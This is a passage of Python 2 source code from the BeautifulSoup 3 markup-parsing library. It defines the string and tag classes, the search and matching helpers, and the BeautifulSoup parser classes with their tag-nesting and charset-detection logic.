unicode(s) return s class NavigableString(unicode, PageElement): def __new__(cls, value): """Create a new NavigableString. When unpickling a NavigableString, this method is called with the string in DEFAULT_OUTPUT_ENCODING. That encoding needs to be passed in to the superclass's __new__ or the superclass won't know how to handle non-ASCII characters. """ if isinstance(value, unicode): return unicode.__new__(cls, value) return unicode.__new__(cls, value, DEFAULT_OUTPUT_ENCODING) def __getnewargs__(self): return (NavigableString.__str__(self),) def __getattr__(self, attr): """text.string gives you text. 
This is for backwards compatibility for Navigable*String, but for CData* it lets you get the string without the CData wrapper.""" if attr == 'string': return self else: raise AttributeError, "'%s' object has no attribute '%s'" % (self.__class__.__name__, attr) def __unicode__(self): return str(self).decode(DEFAULT_OUTPUT_ENCODING) def __str__(self, encoding=DEFAULT_OUTPUT_ENCODING): if encoding: return self.encode(encoding) else: return self class CData(NavigableString): def __str__(self, encoding=DEFAULT_OUTPUT_ENCODING): return "<![CDATA[%s]]>" % NavigableString.__str__(self, encoding) class ProcessingInstruction(NavigableString): def __str__(self, encoding=DEFAULT_OUTPUT_ENCODING): output = self if "%SOUP-ENCODING%" in output: output = self.substituteEncoding(output, encoding) return "<?%s?>" % self.toEncoding(output, encoding) class Comment(NavigableString): def __str__(self, encoding=DEFAULT_OUTPUT_ENCODING): return "<!--%s-->" % NavigableString.__str__(self, encoding) class Declaration(NavigableString): def __str__(self, encoding=DEFAULT_OUTPUT_ENCODING): return "<!%s>" % NavigableString.__str__(self, encoding) class Tag(PageElement): """Represents a found HTML tag with its attributes and contents.""" def _invert(h): "Cheap function to invert a hash." i = {} for k,v in h.items(): i[v] = k return i XML_ENTITIES_TO_SPECIAL_CHARS = { "apos" : "'", "quot" : '"', "amp" : "&", "lt" : "<", "gt" : ">" } XML_SPECIAL_CHARS_TO_ENTITIES = _invert(XML_ENTITIES_TO_SPECIAL_CHARS) def _convertEntities(self, match): """Used in a call to re.sub to replace HTML, XML, and numeric entities with the appropriate Unicode characters. If HTML entities are being converted, any unrecognized entities are escaped.""" x = match.group(1) if self.convertHTMLEntities and x in name2codepoint: return unichr(name2codepoint[x]) elif x in self.XML_ENTITIES_TO_SPECIAL_CHARS: if self.convertXMLEntities: return self.XML_ENTITIES_TO_SPECIAL_CHARS[x] else: return u'&%s;' % x elif len(x) > 0 and x[0] == '#': # Handle numeric entities if len(x) > 1 and x[1] == 'x': return unichr(int(x[2:], 16)) else: return unichr(int(x[1:])) elif self.escapeUnrecognizedEntities: return u'&amp;%s;' % x else: return u'&%s;' % x def __init__(self, parser, name, attrs=None, parent=None, previous=None): "Basic constructor." # We don't actually store the parser object: that lets extracted # chunks be garbage-collected self.parserClass = parser.__class__ self.isSelfClosing = parser.isSelfClosingTag(name) self.name = name if attrs is None: attrs = [] self.attrs = attrs self.contents = [] self.setup(parent, previous) self.hidden = False self.containsSubstitutions = False self.convertHTMLEntities = parser.convertHTMLEntities self.convertXMLEntities = parser.convertXMLEntities self.escapeUnrecognizedEntities = parser.escapeUnrecognizedEntities # Convert any HTML, XML, or numeric entities in the attribute values. 
convert = lambda(k, val): (k, re.sub("&(#\d+|#x[0-9a-fA-F]+|\w+);", self._convertEntities, val)) self.attrs = map(convert, self.attrs) def getString(self): if (len(self.contents) == 1 and isinstance(self.contents[0], NavigableString)): return self.contents[0] def setString(self, string): """Replace the contents of the tag with a string""" self.clear() self.append(string) string = property(getString, setString) def getText(self, separator=u""): if not len(self.contents): return u"" stopNode = self._lastRecursiveChild().next strings = [] current = self.contents[0] while current is not stopNode: if isinstance(current, NavigableString): strings.append(current.strip()) current = current.next return separator.join(strings) text = property(getText) def get(self, key, default=None): """Returns the value of the 'key' attribute for the tag, or the value given for 'default' if it doesn't have that attribute.""" return self._getAttrMap().get(key, default) def clear(self): """Extract all children.""" for child in self.contents[:]: child.extract() def index(self, element): for i, child in enumerate(self.contents): if child is element: return i raise ValueError("Tag.index: element not in tag") def has_key(self, key): return self._getAttrMap().has_key(key) def __getitem__(self, key): """tag[key] returns the value of the 'key' attribute for the tag, and throws an exception if it's not there.""" return self._getAttrMap()[key] def __iter__(self): "Iterating over a tag iterates over its contents." return iter(self.contents) def __len__(self): "The length of a tag is the length of its list of contents." return len(self.contents) def __contains__(self, x): return x in self.contents def __nonzero__(self): "A tag is non-None even if it has no contents." return True def __setitem__(self, key, value): """Setting tag[key] sets the value of the 'key' attribute for the tag.""" self._getAttrMap() self.attrMap[key] = value found = False for i in range(0, len(self.attrs)): if self.attrs[i][0] == key: self.attrs[i] = (key, value) found = True if not found: self.attrs.append((key, value)) self._getAttrMap()[key] = value def __delitem__(self, key): "Deleting tag[key] deletes all 'key' attributes for the tag." for item in self.attrs: if item[0] == key: self.attrs.remove(item) #We don't break because bad HTML can define the same #attribute multiple times. self._getAttrMap() if self.attrMap.has_key(key): del self.attrMap[key] def __call__(self, *args, **kwargs): """Calling a tag like a function is the same as calling its findAll() method. Eg. tag('a') returns a list of all the A tags found within this tag.""" return apply(self.findAll, args, kwargs) def __getattr__(self, tag): #print "Getattr %s.%s" % (self.__class__, tag) if len(tag) > 3 and tag.rfind('Tag') == len(tag)-3: return self.find(tag[:-3]) elif tag.find('__') != 0: return self.find(tag) raise AttributeError, "'%s' object has no attribute '%s'" % (self.__class__, tag) def __eq__(self, other): """Returns true iff this tag has the same name, the same attributes, and the same contents (recursively) as the given tag. NOTE: right now this will return false if two tags have the same attributes in a different order. 
Should this be fixed?""" if other is self: return True if not hasattr(other, 'name') or not hasattr(other, 'attrs') or not hasattr(other, 'contents') or self.name != other.name or self.attrs != other.attrs or len(self) != len(other): return False for i in range(0, len(self.contents)): if self.contents[i] != other.contents[i]: return False return True def __ne__(self, other): """Returns true iff this tag is not identical to the other tag, as defined in __eq__.""" return not self == other def __repr__(self, encoding=DEFAULT_OUTPUT_ENCODING): """Renders this tag as a string.""" return self.__str__(encoding) def __unicode__(self): return self.__str__(None) BARE_AMPERSAND_OR_BRACKET = re.compile("([<>]|" + "&(?!#\d+;|#x[0-9a-fA-F]+;|\w+;)" + ")") def _sub_entity(self, x): """Used with a regular expression to substitute the appropriate XML entity for an XML special character.""" return "&" + self.XML_SPECIAL_CHARS_TO_ENTITIES[x.group(0)[0]] + ";" def __str__(self, encoding=DEFAULT_OUTPUT_ENCODING, prettyPrint=False, indentLevel=0): """Returns a string or Unicode representation of this tag and its contents. To get Unicode, pass None for encoding. NOTE: since Python's HTML parser consumes whitespace, this method is not certain to reproduce the whitespace present in the original string.""" encodedName = self.toEncoding(self.name, encoding) attrs = [] if self.attrs: for key, val in self.attrs: fmt = '%s="%s"' if isinstance(val, basestring): if self.containsSubstitutions and '%SOUP-ENCODING%' in val: val = self.substituteEncoding(val, encoding) # The attribute value either: # # * Contains no embedded double quotes or single quotes. # No problem: we enclose it in double quotes. # * Contains embedded single quotes. No problem: # double quotes work here too. # * Contains embedded double quotes. No problem: # we enclose it in single quotes. # * Embeds both single _and_ double quotes. This # can't happen naturally, but it can happen if # you modify an attribute value after parsing # the document. Now we have a bit of a # problem. We solve it by enclosing the # attribute in single quotes, and escaping any # embedded single quotes to XML entities. if '"' in val: fmt = "%s='%s'" if "'" in val: # TODO: replace with apos when # appropriate. val = val.replace("'", "&squot;") # Now we're okay w/r/t quotes. But the attribute # value might also contain angle brackets, or # ampersands that aren't part of entities. We need # to escape those to XML entities too. 
val = self.BARE_AMPERSAND_OR_BRACKET.sub(self._sub_entity, val) attrs.append(fmt % (self.toEncoding(key, encoding), self.toEncoding(val, encoding))) close = '' closeTag = '' if self.isSelfClosing: close = ' /' else: closeTag = '</%s>' % encodedName indentTag, indentContents = 0, 0 if prettyPrint: indentTag = indentLevel space = (' ' * (indentTag-1)) indentContents = indentTag + 1 contents = self.renderContents(encoding, prettyPrint, indentContents) if self.hidden: s = contents else: s = [] attributeString = '' if attrs: attributeString = ' ' + ' '.join(attrs) if prettyPrint: s.append(space) s.append('<%s%s%s>' % (encodedName, attributeString, close)) if prettyPrint: s.append("\n") s.append(contents) if prettyPrint and contents and contents[-1] != "\n": s.append("\n") if prettyPrint and closeTag: s.append(space) s.append(closeTag) if prettyPrint and closeTag and self.nextSibling: s.append("\n") s = ''.join(s) return s def decompose(self): """Recursively destroys the contents of this tree.""" self.extract() if len(self.contents) == 0: return current = self.contents[0] while current is not None: next = current.next if isinstance(current, Tag): del current.contents[:] current.parent = None current.previous = None current.previousSibling = None current.next = None current.nextSibling = None current = next def prettify(self, encoding=DEFAULT_OUTPUT_ENCODING): return self.__str__(encoding, True) def renderContents(self, encoding=DEFAULT_OUTPUT_ENCODING, prettyPrint=False, indentLevel=0): """Renders the contents of this tag as a string in the given encoding. If encoding is None, returns a Unicode string..""" s=[] for c in self: text = None if isinstance(c, NavigableString): text = c.__str__(encoding) elif isinstance(c, Tag): s.append(c.__str__(encoding, prettyPrint, indentLevel)) if text and prettyPrint: text = text.strip() if text: if prettyPrint: s.append(" " * (indentLevel-1)) s.append(text) if prettyPrint: s.append("\n") return ''.join(s) #Soup methods def find(self, name=None, attrs={}, recursive=True, text=None, **kwargs): """Return only the first child of this Tag matching the given criteria.""" r = None l = self.findAll(name, attrs, recursive, text, 1, **kwargs) if l: r = l[0] return r findChild = find def findAll(self, name=None, attrs={}, recursive=True, text=None, limit=None, **kwargs): """Extracts a list of Tag objects that match the given criteria. You can specify the name of the Tag and any attributes you want the Tag to have. The value of a key-value pair in the 'attrs' map can be a string, a list of strings, a regular expression object, or a callable that takes a string and returns whether or not the string matches for some custom definition of 'matches'. 
The same is true of the tag name.""" generator = self.recursiveChildGenerator if not recursive: generator = self.childGenerator return self._findAll(name, attrs, text, limit, generator, **kwargs) findChildren = findAll # Pre-3.x compatibility methods first = find fetch = findAll def fetchText(self, text=None, recursive=True, limit=None): return self.findAll(text=text, recursive=recursive, limit=limit) def firstText(self, text=None, recursive=True): return self.find(text=text, recursive=recursive) #Private methods def _getAttrMap(self): """Initializes a map representation of this tag's attributes, if not already initialized.""" if not getattr(self, 'attrMap'): self.attrMap = {} for (key, value) in self.attrs: self.attrMap[key] = value return self.attrMap #Generator methods def childGenerator(self): # Just use the iterator from the contents return iter(self.contents) def recursiveChildGenerator(self): if not len(self.contents): raise StopIteration stopNode = self._lastRecursiveChild().next current = self.contents[0] while current is not stopNode: yield current current = current.next # Next, a couple classes to represent queries and their results. class SoupStrainer: """Encapsulates a number of ways of matching a markup element (tag or text).""" def __init__(self, name=None, attrs={}, text=None, **kwargs): self.name = name if isinstance(attrs, basestring): kwargs['class'] = _match_css_class(attrs) attrs = None if kwargs: if attrs: attrs = attrs.copy() attrs.update(kwargs) else: attrs = kwargs self.attrs = attrs self.text = text def __str__(self): if self.text: return self.text else: return "%s|%s" % (self.name, self.attrs) def searchTag(self, markupName=None, markupAttrs={}): found = None markup = None if isinstance(markupName, Tag): markup = markupName markupAttrs = markup callFunctionWithTagData = callable(self.name) \ and not isinstance(markupName, Tag) if (not self.name) \ or callFunctionWithTagData \ or (markup and self._matches(markup, self.name)) \ or (not markup and self._matches(markupName, self.name)): if callFunctionWithTagData: match = self.name(markupName, markupAttrs) else: match = True markupAttrMap = None for attr, matchAgainst in self.attrs.items(): if not markupAttrMap: if hasattr(markupAttrs, 'get'): markupAttrMap = markupAttrs else: markupAttrMap = {} for k,v in markupAttrs: markupAttrMap[k] = v attrValue = markupAttrMap.get(attr) if not self._matches(attrValue, matchAgainst): match = False break if match: if markup: found = markup else: found = markupName return found def search(self, markup): #print 'looking for %s in %s' % (self, markup) found = None # If given a list of items, scan it for a text element that # matches. if hasattr(markup, "__iter__") \ and not isinstance(markup, Tag): for element in markup: if isinstance(element, NavigableString) \ and self.search(element): found = element break # If it's a Tag, make sure its name or attributes match. # Don't bother with Tags if we're searching for text. elif isinstance(markup, Tag): if not self.text: found = self.searchTag(markup) # If it's text, make sure the text matches. 
elif isinstance(markup, NavigableString) or \ isinstance(markup, basestring): if self._matches(markup, self.text): found = markup else: raise Exception, "I don't know how to match against a %s" \ % markup.__class__ return found def _matches(self, markup, matchAgainst): #print "Matching %s against %s" % (markup, matchAgainst) result = False if matchAgainst is True: result = markup is not None elif callable(matchAgainst): result = matchAgainst(markup) else: #Custom match methods take the tag as an argument, but all #other ways of matching match the tag name as a string. if isinstance(markup, Tag): markup = markup.name if markup and not isinstance(markup, basestring): markup = unicode(markup) #Now we know that chunk is either a string, or None. if hasattr(matchAgainst, 'match'): # It's a regexp object. result = markup and matchAgainst.search(markup) elif hasattr(matchAgainst, '__iter__'): # list-like result = markup in matchAgainst elif hasattr(matchAgainst, 'items'): result = markup.has_key(matchAgainst) elif matchAgainst and isinstance(markup, basestring): if isinstance(markup, unicode): matchAgainst = unicode(matchAgainst) else: matchAgainst = str(matchAgainst) if not result: result = matchAgainst == markup return result class ResultSet(list): """A ResultSet is just a list that keeps track of the SoupStrainer that created it.""" def __init__(self, source): list.__init__([]) self.source = source # Now, some helper functions. def buildTagMap(default, *args): """Turns a list of maps, lists, or scalars into a single map. Used to build the SELF_CLOSING_TAGS, NESTABLE_TAGS, and NESTING_RESET_TAGS maps out of lists and partial maps.""" built = {} for portion in args: if hasattr(portion, 'items'): #It's a map. Merge it. for k,v in portion.items(): built[k] = v elif hasattr(portion, '__iter__'): # is a list #It's a list. Map each item to the default. for k in portion: built[k] = default else: #It's a scalar. Map it to the default. built[portion] = default return built # Now, the parser classes. class BeautifulStoneSoup(Tag, SGMLParser): """This class contains the basic parser and search code. It defines a parser that knows nothing about tag behavior except for the following: You can't close a tag without closing all the tags it encloses. That is, "<foo><bar></foo>" actually means "<foo><bar></bar></foo>". [Another possible explanation is "<foo><bar /></foo>", but since this class defines no SELF_CLOSING_TAGS, it will never use that explanation.] This class is useful for parsing XML or made-up markup languages, or when BeautifulSoup makes an assumption counter to what you were expecting.""" SELF_CLOSING_TAGS = {} NESTABLE_TAGS = {} RESET_NESTING_TAGS = {} QUOTE_TAGS = {} PRESERVE_WHITESPACE_TAGS = [] MARKUP_MASSAGE = [(re.compile('(<[^<>]*)/>'), lambda x: x.group(1) + ' />'), (re.compile('<!\s+([^<>]*)>'), lambda x: '<!' + x.group(1) + '>') ] ROOT_TAG_NAME = u'[document]' HTML_ENTITIES = "html" XML_ENTITIES = "xml" XHTML_ENTITIES = "xhtml" # TODO: This only exists for backwards-compatibility ALL_ENTITIES = XHTML_ENTITIES # Used when determining whether a text node is all whitespace and # can be replaced with a single space. A text node that contains # fancy Unicode spaces (usually non-breaking) should be left # alone. 
STRIP_ASCII_SPACES = { 9: None, 10: None, 12: None, 13: None, 32: None, } def __init__(self, markup="", parseOnlyThese=None, fromEncoding=None, markupMassage=True, smartQuotesTo=XML_ENTITIES, convertEntities=None, selfClosingTags=None, isHTML=False): """The Soup object is initialized as the 'root tag', and the provided markup (which can be a string or a file-like object) is fed into the underlying parser. sgmllib will process most bad HTML, and the BeautifulSoup class has some tricks for dealing with some HTML that kills sgmllib, but Beautiful Soup can nonetheless choke or lose data if your data uses self-closing tags or declarations incorrectly. By default, Beautiful Soup uses regexes to sanitize input, avoiding the vast majority of these problems. If the problems don't apply to you, pass in False for markupMassage, and you'll get better performance. The default parser massage techniques fix the two most common instances of invalid HTML that choke sgmllib: <br/> (No space between name of closing tag and tag close) <! --Comment--> (Extraneous whitespace in declaration) You can pass in a custom list of (RE object, replace method) tuples to get Beautiful Soup to scrub your input the way you want.""" self.parseOnlyThese = parseOnlyThese self.fromEncoding = fromEncoding self.smartQuotesTo = smartQuotesTo self.convertEntities = convertEntities # Set the rules for how we'll deal with the entities we # encounter if self.convertEntities: # It doesn't make sense to convert encoded characters to # entities even while you're converting entities to Unicode. # Just convert it all to Unicode. self.smartQuotesTo = None if convertEntities == self.HTML_ENTITIES: self.convertXMLEntities = False self.convertHTMLEntities = True self.escapeUnrecognizedEntities = True elif convertEntities == self.XHTML_ENTITIES: self.convertXMLEntities = True self.convertHTMLEntities = True self.escapeUnrecognizedEntities = False elif convertEntities == self.XML_ENTITIES: self.convertXMLEntities = True self.convertHTMLEntities = False self.escapeUnrecognizedEntities = False else: self.convertXMLEntities = False self.convertHTMLEntities = False self.escapeUnrecognizedEntities = False self.instanceSelfClosingTags = buildTagMap(None, selfClosingTags) SGMLParser.__init__(self) if hasattr(markup, 'read'): # It's a file-type object. markup = markup.read() self.markup = markup self.markupMassage = markupMassage try: self._feed(isHTML=isHTML) except StopParsing: pass self.markup = None # The markup can now be GCed def convert_charref(self, name): """This method fixes a bug in Python's SGMLParser.""" try: n = int(name) except ValueError: return if not 0 <= n <= 127 : # ASCII ends at 127, not 255 return return self.convert_codepoint(n) def _feed(self, inDocumentEncoding=None, isHTML=False): # Convert the document to Unicode. markup = self.markup if isinstance(markup, unicode): if not hasattr(self, 'originalEncoding'): self.originalEncoding = None else: dammit = UnicodeDammit\ (markup, [self.fromEncoding, inDocumentEncoding], smartQuotesTo=self.smartQuotesTo, isHTML=isHTML) markup = dammit.unicode self.originalEncoding = dammit.originalEncoding self.declaredHTMLEncoding = dammit.declaredHTMLEncoding if markup: if self.markupMassage: if not hasattr(self.markupMassage, "__iter__"): self.markupMassage = self.MARKUP_MASSAGE for fix, m in self.markupMassage: markup = fix.sub(m, markup) # TODO: We get rid of markupMassage so that the # soup object can be deepcopied later on. Some # Python installations can't copy regexes. 
If anyone # was relying on the existence of markupMassage, this # might cause problems. del(self.markupMassage) self.reset() SGMLParser.feed(self, markup) # Close out any unfinished strings and close all the open tags. self.endData() while self.currentTag.name != self.ROOT_TAG_NAME: self.popTag() def __getattr__(self, methodName): """This method routes method call requests to either the SGMLParser superclass or the Tag superclass, depending on the method name.""" #print "__getattr__ called on %s.%s" % (self.__class__, methodName) if methodName.startswith('start_') or methodName.startswith('end_') \ or methodName.startswith('do_'): return SGMLParser.__getattr__(self, methodName) elif not methodName.startswith('__'): return Tag.__getattr__(self, methodName) else: raise AttributeError def isSelfClosingTag(self, name): """Returns true iff the given string is the name of a self-closing tag according to this parser.""" return self.SELF_CLOSING_TAGS.has_key(name) \ or self.instanceSelfClosingTags.has_key(name) def reset(self): Tag.__init__(self, self, self.ROOT_TAG_NAME) self.hidden = 1 SGMLParser.reset(self) self.currentData = [] self.currentTag = None self.tagStack = [] self.quoteStack = [] self.pushTag(self) def popTag(self): tag = self.tagStack.pop() #print "Pop", tag.name if self.tagStack: self.currentTag = self.tagStack[-1] return self.currentTag def pushTag(self, tag): #print "Push", tag.name if self.currentTag: self.currentTag.contents.append(tag) self.tagStack.append(tag) self.currentTag = self.tagStack[-1] def endData(self, containerClass=NavigableString): if self.currentData: currentData = u''.join(self.currentData) if (currentData.translate(self.STRIP_ASCII_SPACES) == '' and not set([tag.name for tag in self.tagStack]).intersection( self.PRESERVE_WHITESPACE_TAGS)): if '\n' in currentData: currentData = '\n' else: currentData = ' ' self.currentData = [] if self.parseOnlyThese and len(self.tagStack) <= 1 and \ (not self.parseOnlyThese.text or \ not self.parseOnlyThese.search(currentData)): return o = containerClass(currentData) o.setup(self.currentTag, self.previous) if self.previous: self.previous.next = o self.previous = o self.currentTag.contents.append(o) def _popToTag(self, name, inclusivePop=True): """Pops the tag stack up to and including the most recent instance of the given tag. If inclusivePop is false, pops the tag stack up to but *not* including the most recent instqance of the given tag.""" #print "Popping to %s" % name if name == self.ROOT_TAG_NAME: return numPops = 0 mostRecentTag = None for i in range(len(self.tagStack)-1, 0, -1): if name == self.tagStack[i].name: numPops = len(self.tagStack)-i break if not inclusivePop: numPops = numPops - 1 for i in range(0, numPops): mostRecentTag = self.popTag() return mostRecentTag def _smartPop(self, name): """We need to pop up to the previous tag of this type, unless one of this tag's nesting reset triggers comes between this tag and the previous tag of this type, OR unless this tag is a generic nesting trigger and another generic nesting trigger comes between this tag and the previous tag of this type. Examples: <p>Foo<b>Bar *<p>* should pop to 'p', not 'b'. <p>Foo<table>Bar *<p>* should pop to 'table', not 'p'. <p>Foo<table><tr>Bar *<p>* should pop to 'tr', not 'p'. <li><ul><li> *<li>* should pop to 'ul', not the first 'li'. 
<tr><table><tr> *<tr>* should pop to 'table', not the first 'tr' <td><tr><td> *<td>* should pop to 'tr', not the first 'td' """ nestingResetTriggers = self.NESTABLE_TAGS.get(name) isNestable = nestingResetTriggers != None isResetNesting = self.RESET_NESTING_TAGS.has_key(name) popTo = None inclusive = True for i in range(len(self.tagStack)-1, 0, -1): p = self.tagStack[i] if (not p or p.name == name) and not isNestable: #Non-nestable tags get popped to the top or to their #last occurance. popTo = name break if (nestingResetTriggers is not None and p.name in nestingResetTriggers) \ or (nestingResetTriggers is None and isResetNesting and self.RESET_NESTING_TAGS.has_key(p.name)): #If we encounter one of the nesting reset triggers #peculiar to this tag, or we encounter another tag #that causes nesting to reset, pop up to but not #including that tag. popTo = p.name inclusive = False break p = p.parent if popTo: self._popToTag(popTo, inclusive) def unknown_starttag(self, name, attrs, selfClosing=0): #print "Start tag %s: %s" % (name, attrs) if self.quoteStack: #This is not a real tag. #print "<%s> is not real!" % name attrs = ''.join([' %s="%s"' % (x, y) for x, y in attrs]) self.handle_data('<%s%s>' % (name, attrs)) return self.endData() if not self.isSelfClosingTag(name) and not selfClosing: self._smartPop(name) if self.parseOnlyThese and len(self.tagStack) <= 1 \ and (self.parseOnlyThese.text or not self.parseOnlyThese.searchTag(name, attrs)): return tag = Tag(self, name, attrs, self.currentTag, self.previous) if self.previous: self.previous.next = tag self.previous = tag self.pushTag(tag) if selfClosing or self.isSelfClosingTag(name): self.popTag() if name in self.QUOTE_TAGS: #print "Beginning quote (%s)" % name self.quoteStack.append(name) self.literal = 1 return tag def unknown_endtag(self, name): #print "End tag %s" % name if self.quoteStack and self.quoteStack[-1] != name: #This is not a real end tag. #print "</%s> is not real!" % name self.handle_data('</%s>' % name) return self.endData() self._popToTag(name) if self.quoteStack and self.quoteStack[-1] == name: self.quoteStack.pop() self.literal = (len(self.quoteStack) > 0) def handle_data(self, data): self.currentData.append(data) def _toStringSubclass(self, text, subclass): """Adds a certain piece of text to the tree as a NavigableString subclass.""" self.endData() self.handle_data(text) self.endData(subclass) def handle_pi(self, text): """Handle a processing instruction as a ProcessingInstruction object, possibly one with a %SOUP-ENCODING% slot into which an encoding will be plugged later.""" if text[:3] == "xml": text = u"xml version='1.0' encoding='%SOUP-ENCODING%'" self._toStringSubclass(text, ProcessingInstruction) def handle_comment(self, text): "Handle comments as Comment objects." self._toStringSubclass(text, Comment) def handle_charref(self, ref): "Handle character references as data." if self.convertEntities: data = unichr(int(ref)) else: data = '&#%s;' % ref self.handle_data(data) def handle_entityref(self, ref): """Handle entity references as data, possibly converting known HTML and/or XML entity references to the corresponding Unicode characters.""" data = None if self.convertHTMLEntities: try: data = unichr(name2codepoint[ref]) except KeyError: pass if not data and self.convertXMLEntities: data = self.XML_ENTITIES_TO_SPECIAL_CHARS.get(ref) if not data and self.convertHTMLEntities and \ not self.XML_ENTITIES_TO_SPECIAL_CHARS.get(ref): # TODO: We've got a problem here. 
We're told this is # an entity reference, but it's not an XML entity # reference or an HTML entity reference. Nonetheless, # the logical thing to do is to pass it through as an # unrecognized entity reference. # # Except: when the input is "&carol;" this function # will be called with input "carol". When the input is # "AT&T", this function will be called with input # "T". We have no way of knowing whether a semicolon # was present originally, so we don't know whether # this is an unknown entity or just a misplaced # ampersand. # # The more common case is a misplaced ampersand, so I # escape the ampersand and omit the trailing semicolon. data = "&amp;%s" % ref if not data: # This case is different from the one above, because we # haven't already gone through a supposedly comprehensive # mapping of entities to Unicode characters. We might not # have gone through any mapping at all. So the chances are # very high that this is a real entity, and not a # misplaced ampersand. data = "&%s;" % ref self.handle_data(data) def handle_decl(self, data): "Handle DOCTYPEs and the like as Declaration objects." self._toStringSubclass(data, Declaration) def parse_declaration(self, i): """Treat a bogus SGML declaration as raw data. Treat a CDATA declaration as a CData object.""" j = None if self.rawdata[i:i+9] == '<![CDATA[': k = self.rawdata.find(']]>', i) if k == -1: k = len(self.rawdata) data = self.rawdata[i+9:k] j = k+3 self._toStringSubclass(data, CData) else: try: j = SGMLParser.parse_declaration(self, i) except SGMLParseError: toHandle = self.rawdata[i:] self.handle_data(toHandle) j = i + len(toHandle) return j class BeautifulSoup(BeautifulStoneSoup): """This parser knows the following facts about HTML: * Some tags have no closing tag and should be interpreted as being closed as soon as they are encountered. * The text inside some tags (ie. 'script') may contain tags which are not really part of the document and which should be parsed as text, not tags. If you want to parse the text as tags, you can always fetch it and parse it explicitly. * Tag nesting rules: Most tags can't be nested at all. For instance, the occurance of a <p> tag should implicitly close the previous <p> tag. <p>Para1<p>Para2 should be transformed into: <p>Para1</p><p>Para2 Some tags can be nested arbitrarily. For instance, the occurance of a <blockquote> tag should _not_ implicitly close the previous <blockquote> tag. Alice said: <blockquote>Bob said: <blockquote>Blah should NOT be transformed into: Alice said: <blockquote>Bob said: </blockquote><blockquote>Blah Some tags can be nested, but the nesting is reset by the interposition of other tags. For instance, a <tr> tag should implicitly close the previous <tr> tag within the same <table>, but not close a <tr> tag in another table. <table><tr>Blah<tr>Blah should be transformed into: <table><tr>Blah</tr><tr>Blah but, <tr>Blah<table><tr>Blah should NOT be transformed into <tr>Blah<table></tr><tr>Blah Differing assumptions about tag nesting rules are a major source of problems with the BeautifulSoup class. 
If BeautifulSoup is not treating as nestable a tag your page author treats as nestable, try ICantBelieveItsBeautifulSoup, MinimalSoup, or BeautifulStoneSoup before writing your own subclass.""" def __init__(self, *args, **kwargs): if not kwargs.has_key('smartQuotesTo'): kwargs['smartQuotesTo'] = self.HTML_ENTITIES kwargs['isHTML'] = True BeautifulStoneSoup.__init__(self, *args, **kwargs) SELF_CLOSING_TAGS = buildTagMap(None, ('br' , 'hr', 'input', 'img', 'meta', 'spacer', 'link', 'frame', 'base', 'col')) PRESERVE_WHITESPACE_TAGS = set(['pre', 'textarea']) QUOTE_TAGS = {'script' : None, 'textarea' : None} #According to the HTML standard, each of these inline tags can #contain another tag of the same type. Furthermore, it's common #to actually use these tags this way. NESTABLE_INLINE_TAGS = ('span', 'font', 'q', 'object', 'bdo', 'sub', 'sup', 'center') #According to the HTML standard, these block tags can contain #another tag of the same type. Furthermore, it's common #to actually use these tags this way. NESTABLE_BLOCK_TAGS = ('blockquote', 'div', 'fieldset', 'ins', 'del') #Lists can contain other lists, but there are restrictions. NESTABLE_LIST_TAGS = { 'ol' : [], 'ul' : [], 'li' : ['ul', 'ol'], 'dl' : [], 'dd' : ['dl'], 'dt' : ['dl'] } #Tables can contain other tables, but there are restrictions. NESTABLE_TABLE_TAGS = {'table' : [], 'tr' : ['table', 'tbody', 'tfoot', 'thead'], 'td' : ['tr'], 'th' : ['tr'], 'thead' : ['table'], 'tbody' : ['table'], 'tfoot' : ['table'], } NON_NESTABLE_BLOCK_TAGS = ('address', 'form', 'p', 'pre') #If one of these tags is encountered, all tags up to the next tag of #this type are popped. RESET_NESTING_TAGS = buildTagMap(None, NESTABLE_BLOCK_TAGS, 'noscript', NON_NESTABLE_BLOCK_TAGS, NESTABLE_LIST_TAGS, NESTABLE_TABLE_TAGS) NESTABLE_TAGS = buildTagMap([], NESTABLE_INLINE_TAGS, NESTABLE_BLOCK_TAGS, NESTABLE_LIST_TAGS, NESTABLE_TABLE_TAGS) # Used to detect the charset in a META tag; see start_meta CHARSET_RE = re.compile("((^|;)\s*charset=)([^;]*)", re.M) def start_meta(self, attrs): """Beautiful Soup can detect a charset included in a META tag, try to convert the document to that charset, and re-parse the document from the beginning.""" httpEquiv = None contentType = None contentTypeIndex = None tagNeedsEncodingSubstitution = False for i in range(0, len(attrs)): key, value = attrs[i] key = key.lower() if key == 'http-equiv': httpEquiv = value elif key == 'content': contentType = value contentTypeIndex = i if httpEquiv and contentType: # It's an interesting meta tag. match = self.CHARSET_RE.search(contentType) if match: if (self.declaredHTMLEncoding is not None or self.originalEncoding == self.fromEncoding): # An HTML encoding was sniffed while converting # the document to Unicode, or an HTML encoding was # sniffed during a previous pass through the # document, or an encoding was specified # explicitly and it worked. Rewrite the meta tag. def rewrite(match): return match.group(1) + "%SOUP-ENCODING%" newAttr = self.CHARSET_RE.sub(rewrite, contentType) attrs[contentTypeIndex] = (attrs[contentTypeIndex][0], newAttr) tagNeedsEncodingSubstitution = True else: # This is our first pass through the document. # Go through it again with the encoding information. 
newCharset = match.group(3) if newCharset and newCharset != self.originalEncoding: self.declaredHTMLEncoding = newCharset self._feed(self.declaredHTMLEncoding) raise StopParsing pass tag = self.unknown_starttag("meta", attrs) if tag and tagNeedsEncodingSubstitution: tag.containsSubstitutions = True class StopParsing(Exception): pass class ICantBelieveItsBeautifulSoup(BeautifulSoup): """The BeautifulSoup class is oriented towards skipping over common HTML errors like unclosed tags. However, sometimes it makes errors of its own. For instance, consider this fragment: <b>Foo<b>Bar</b></b> This is perfectly valid (if bizarre) HTML. However, the BeautifulSoup class will implicitly close the first b tag when it encounters the second 'b'. It will think the author wrote "<b>Foo<b>Bar", and didn't close the first 'b' tag, because there's no real-world reason to bold something that's already bold. When it encounters '</b></b>' it will close two more 'b' tags, for a grand total of three tags closed instead of two. This can throw off the rest of your document structure. The same is true of a number of other tags, listed below. It's much more common for someone to forget to close a 'b' tag than to actually use nested 'b' tags, and the BeautifulSoup class handles the common case. This class handles the not-co-common case: where you can't believe someone wrote what they did, but it's valid HTML and BeautifulSoup screwed up by assuming it wouldn't be.""" I_CANT_BELIEVE_THEYRE_NESTABLE_INLINE_TAGS = \ ('em', 'big', 'i', 'small', 'tt', 'abbr', 'acronym', 'strong', 'cite', 'code', 'dfn', 'kbd', 'samp', 'strong', 'var', 'b', 'big') I_CANT_BELIEVE_THEYRE_NESTABLE_BLOCK_TAGS = ('noscript') NESTABLE_TAGS = buildTagMap([], BeautifulSoup.NESTABLE_TAGS, 